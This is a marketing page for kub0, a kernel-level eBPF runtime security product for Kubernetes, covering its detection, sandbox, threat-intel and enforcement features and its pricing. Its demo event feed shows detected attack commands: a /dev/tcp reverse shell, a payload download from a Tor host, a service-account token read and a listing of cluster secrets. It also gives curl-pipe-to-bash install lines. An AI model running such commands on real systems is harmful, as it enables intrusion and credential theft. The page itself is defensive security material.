Free—No Credit Card

kub0

Kernel-native runtime security for Kubernetes.

See every process, syscall, and connection at the Linux kernel—with AI verdicts from your own infrastructure. Catch threats in milliseconds, then turn on per-policy enforcement to block at the syscall, on your terms.

Get free API key → See how it works →

—

samples analyzed

—

TracingPolicies

—

ATT&CK tactics

—

ATLAS techniques

HUNT / DEMO kub0-aus

—network_connect10.0.1.12:6443 [k8s-api]

—process_exec/usr/bin/containerd-shim-runc-v2

—file_open/var/run/secrets/kubernetes.io/token

—process_exec/usr/local/bin/node server.js

—network_connect10.0.1.45:5432 [postgres]

—process_exec/usr/bin/curl -s https://185.220.x.x/dl

—network_connect185.220.101.47:443 [TOR_EXIT]

—process_exec/bin/bash -c "chmod +x /tmp/.x/p"

—file_write/tmp/.x/payload.elf

—process_exec/bin/sh -i >& /dev/tcp/10.x.x.x/4444 0>&1

—VERDICTREVERSE_SHELL conf=0.99 TA0059

—process_exec/usr/bin/kubectl get secrets -A

—VERDICTRECON conf=0.87 TA0007

—VERDICTC2_BEACONING conf=0.94 TA0011

Why kub0

Not another SIEM.
Not another agent.

Kernel-level visibility

See what actually happened—not what an agent reported. No logs to tamper with, no userspace to bypass.

Verdicts, not just alerts

Every event gets a kernel-level verdict—not another ticket in the queue. Turn on per-policy enforcement to block at the syscall when you're ready.

Your cluster, your AI

Threat analysis runs on your infrastructure. Data never leaves the cluster. No cloud dependency.

Can't crash your nodes

No kernel module. Bounded eBPF programs fail open by design. System error? Traffic flows.

Product

Runtime security
from syscall to verdict

LIVE

Hunt

See every process, connection, and file operation across your cluster in real time. Malicious behavior is flagged at the kernel the moment it happens—with per-policy enforcement to block at the syscall when you choose.

— ATT&CK tactics · — detection rules

LIVE

Assay

Upload a suspicious binary. It runs in a traced sandbox, gets scanned for known signatures, and receives an AI behavioral verdict—all in seconds. Every scan grows a shared behavioral corpus that clusters similar variants automatically.

sandbox detonation · AI verdict · self-growing corpus

Intelligence

LIVE

Landscape

The cyber threat landscape on one map—APT activity, trending actors, KEV exploits, and campaign likelihood, focused by kill-chain stage.

threat map · KEV · ATT&CK

PRO

Feeds

CVE, KEV, and OTX threat-intel feeds correlated to your cluster—IOCs, adversary tracking, and the exploits that actually reach you.

CVE · KEV · OTX

PRO

Investigate

Investigate anything—CVE, actor, IOC, domain, or hash—and pivot across the linked graph: actor → sample → IOC → technique. Press ⌘K from any page.

cross-entity graph · ⌘K

Engine

LIVE

Vigiles AI

Security AI that runs on your infrastructure. Analyzes raw kernel events and returns confidence-scored threat verdicts. Your data never leaves the cluster.

on-prem inference · no cloud dependency

LIVE

API

REST + SSE for everything. Stream events in real-time, submit samples, query verdicts, manage the deny list.

REST · SSE · JSON

LIVE

Enforce

Managed deny list and path enforcement with block or monitor modes—per policy. Roll enforcement out node by node as your baseline proves clean.

deny list · path enforce · block/monitor

ALPHA

Posture

See which attack techniques you're covered for and where the gaps are. Live coverage scoring from your actual cluster state.

coverage map · gap analysis · enforcement readiness

Deploy

From kubectl apply to
kernel coverage in 2 minutes

Deploy Hunt policies

# Apply TracingPolicies + vigiles-probe sensor kubectl apply -f https://kub0.ai/deploy/hunt.yaml

# Signup + deploy in one step curl -sSL https://kub0.ai/install | bash

# API key only (no cluster install) curl -sX POST https://kub0.ai/api/signup \ -H "Content-Type: application/json" \ -d '{"email":"you@example.com"}' → {"token":"kub0_...","credits":100}

Events stream in

# Behavioral events appear live process_exec → /usr/bin/python3 network_connect → 185.220.101.x:443

Verdict & enforce

# Vigiles classifies in real time. Enforce per-policy. VERDICT: C2_BEACONING conf=0.94 · <500ms · TA0011 ENFORCE: /bin/sh reverse shell blocked · per-policy · <1ms

Pricing

Detection is free.
Pay when you need intelligence.

Community

No credit card. No time limit.

Detection + per-policy enforcement—up to 10 nodes
— detection rules across — ATT&CK tactics
Real-time event stream with threat mapping
100 Assay sandbox credits
eBPF sensor included
Any Linux Kubernetes cluster

Get free API key →

Waitlist

Pro

Coming soon

Scale past 10 nodes. Full intelligence stack.

Everything in Community, plus
AI-driven threat verdicts (on-prem or hosted)
CVE + threat intel feeds
Coverage scoring + gap analysis
Managed deny list + auto-enforcement

Large deployment?

50+ nodes, private corpus, compliance requirements, or air-gapped clusters?

contact@kub0.ai →

kub0

Not another SIEM.Not another agent.

Runtime securityfrom syscall to verdict

From kubectl apply tokernel coverage in 2 minutes

Detection is free.Pay when you need intelligence.

Not another SIEM.
Not another agent.

Runtime security
from syscall to verdict

From kubectl apply to
kernel coverage in 2 minutes

Detection is free.
Pay when you need intelligence.